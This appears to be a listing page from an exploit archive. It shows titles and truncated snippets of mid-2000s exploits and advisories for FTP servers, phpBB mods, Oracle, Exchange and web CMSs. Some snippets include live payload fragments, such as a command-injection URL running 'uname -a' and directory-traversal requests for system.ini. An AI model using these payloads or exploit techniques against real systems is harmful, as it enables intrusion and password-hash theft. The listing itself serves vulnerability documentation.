Fusion SBX <= 1.2 Remote Command Execution Exploit

Exploit for unknown platform in category web applications ================================================== Fusion SBX = 1.2 Remote Command Execution Exploit ================================================== / Fusion SBX = 1.2 exploit sileFSBXxpl This exploit use vulnerability found into Fusion...

ZPanel 2.5b10 - SQL Injection

!/usr/bin/perl use LWP::UserAgent; ZPanel Ver. 2.5- Public BETA 2 Release date: 1/15/2005 sql injection exploit with one char bruteforce work on all mysql versions -------------------------------------------------------- example: r57zpanel.pl http://192.168.0.1/zpanel/index.php admin PATH :...

&quot;Старый добрый&quot; DForum

"Старый добрый" DForum 4пальца Удивительное дело, сообщество вебмастеров в интернете на редкость консервативно. Многие скрипты, которые были созданы в конце девяностых, до сих пор находят себе применение на самых разных сайтах. А старые скрипты - это старые болячки, как я писал в одной из статей...

BulletProof FTP Server 2.4.0.31 Local Privilege Escalation Exploit

No description provided by source. // //Privilege escalation in BulletProof FTP Server v2.4.0.31 //By Jerome Athias //jerome DOT athias AT free DOT fr //Discovered by Reed Arvin reedarvinatgmaildotcom //http://reedarvin.thearvins.com // //Little PoC //Gives you a shell with system privileges //...

Golden FTP Server Pro 2.52 Remote Buffer Overflow Exploit (3rd)

No description provided by source. / \ golden ftp 2.52.0.0 remote r00t exploit / \ remote r00t exploit binds 4444 port on remote machine. / tested on: winxp sp0 rus \ / simple stack overflow in golden ftpd. \ if retaddr isn't right, ftpd will crash, and admin will be in big shit / 'coz ftpd won't...

Buffer overflow in KMiNT21 Software Golden FTP Server Pro v2.52 &#40;10.04.2005&#41;

Summary: Buffer overflow in KMiNT21 Software Golden FTP Server Pro v2.52 10.04.2005 http://www.goldenftpserver.com/ Details: Passing an overly long username parameter to the FTP server causes the EIP register to be overwritten after the USER/PASS login sequence is completed. Once this has been do...

E-Cart 1.1 - &#039;index.cgi&#039; Remote Command Execution

!/usr/bin/perl Example added if code doesn't work for ya: http://SITE/DIRTOECART/index.cgi?action=viewart&cat=reproductoresdvd&art=reproductordvp-ns315.dat|uname%20-a| /str0ke info: [email protected] use IO::Socket; print "\n\n www.badroot.org \n\n"; print " E-Cart E-Commerce Software...

yawcam 0.2.5 - Directory Traversal

source: https://www.securityfocus.com/bid/13295/info Yawcam is prone to a directory traversal vulnerability that could allow attackers to read files outside the Web root. GET ................\windows\system.ini HTTP/1.0 GET ................\windows\system.ini HTTP/1.0...

PMSoftware Simple Web Server 1.0 - Remote Stack Overflow

/ PMsoftware mini http server remote stack overflow exploit author : c0d3r "kaveh razavi" [email protected] [email protected] package : PMsoftware Web Server version 1.0 advisory : http://www.securiteam.com/windowsntfocus/5TP0B2KFGA.html company address : www.pmx.it timeline : 17 Feb 2005 : bu...

PostgreSQL <= 8.01 Remote Reboot Denial of Service Exploit

Exploit for multiple platform in category dos / poc ========================================================== PostgreSQL include include include include include define DEFAULTPORT "5321" define DEFAULTDB "postgresql" define FUNCNAME "uKttest" define TABLENAME "unl0cktable" char str4000; char...

Microsoft Exchange Server - Remote Code Execution (MS05-021)

!/bin/perl MS05-021 Exchange X-LINK2STATE Heap Overflow Author: Evgeny Pinchuk For educational purposes only. Tested on: Windows 2000 Server SP4 EN Microsoft Exchange 2000 SP3 Thanks and greets: Halvar Flake thx for the right directions Alex Behar, Yuri Gushin, Ishay Sommer, Ziv Gadot and Dave...

Oracle Database Server 10.1.0.2 - Local Buffer Overflow

Oracle Database Server 10.1.0.2 - Local Buffer Overflow / Advanced SQL Injection in Oracle databases Exploit for the buffer overflow vulnerability in procedure MDSYS.MD2.SDOCODESIZE of Oracle Database Server version 10.1.0.2 under Windows 2000 Server SP4. Fixes available at...

DeluxeFtp 6.x Local Password Disclosure Exploit

No description provided by source. / DeluxeFtp 6.x Local Password Disclosure Exploit by Kozan Application: DeluxeFtp 6.x and probably prior versions Vendor: www.deluxeftp.com Vulnerable Description: DeluxeFtp 6.x discloses passwords to local users. Bug Discovered by: Lostmon Exploit Coded by: Koz...

Oracle Database 10.1 - MDSYS.MD2.SDO_CODE_SIZE Buffer Overflow

source: https://www.securityfocus.com/bid/13145/info Oracle Database is reported prone to a buffer overflow vulnerability. Reportedly this issue affects the 'MDSYS.MD2.SDOCODESIZE' procedure. An attacker can supply excessive data to an affected routine resulting in overflowing a destination buffe...

phpBB 2.0.13 - Calendar Pro mod Get Hash

phpBB 2.0.13 - Calendar Pro mod Get Hash !/usr/bin/perl -w use IO::Socket; Example: C:\calphpbb.pl www.site.com /phpBB2/ 2 'Calendar Pro' Mod for phpBB Connecting... + Connected! Sending Data... Data Sent, Waiting for response... + MD5 Hash for user with id=2 is: 81dc9bdb52d04dc20036dbd8313ed055 ...

phpBB 2.0.13 - &#039;Calendar Pro&#039; mod Get Hash

!/usr/bin/perl -w use IO::Socket; Example: C:\calphpbb.pl www.site.com /phpBB2/ 2 'Calendar Pro' Mod for phpBB Connecting... + Connected! Sending Data... Data Sent, Waiting for response... + MD5 Hash for user with id=2 is: 81dc9bdb52d04dc20036dbd8313ed055 if @ARGV \n"; print " e.g.: calphpbb.pl...

phpBB 2.0.13 - &#039;downloads.php&#039; mod Get Hash

!/usr/bin/perl -w use IO::Socket; Example: C:\phpbb.pl www.site.com /phpBB2/ 2 downloads.php mod in phpBB \n"; print " e.g.: phpbb.pl www.site.com /phpBB2/ 2 \n"; print " - site address\n"; print " - forum folder\n"; print " - user id 2 default for phpBB admin\n"; print "||\n"; print "\n\n"; exit...

Microsoft Windows XP - Local Denial of Service

Microsoft Windows XP - Local Denial of Service source: https://www.securityfocus.com/bid/12870/info It is reported that Microsoft Windows XP Service Pack 1 is prone to a local denial of service vulnerability. The issue is reported to manifest when a raw IP over IP socket is created and data is...

betaParticle.txt

BetaParticle bp is a ASP CMS Blog + Gallery . I found 2 vulnerabilities in BetaParticle. http://example.com/bp : is BP path ! 1 BP Database Disclosure For version = 3.0 Database path : http://example.com/Blog.mdb And BP path must be : http://example.com/bp/ you can download it and disclose the...

[PersianHacker.NET 200503-10]PHP-Fusion v5.01 Html Injection Vulnerability

PersianHacker.NET 200503-10PHP-Fusion v5.01 Html Injection Vulnerability Date: 2005 March Bug Number: 10 PHP-Fusion a light-weight open-source content management system CMS written in PHP. It utilises a mySQL database to store your site content and includes a simple, comprehensive adminstration...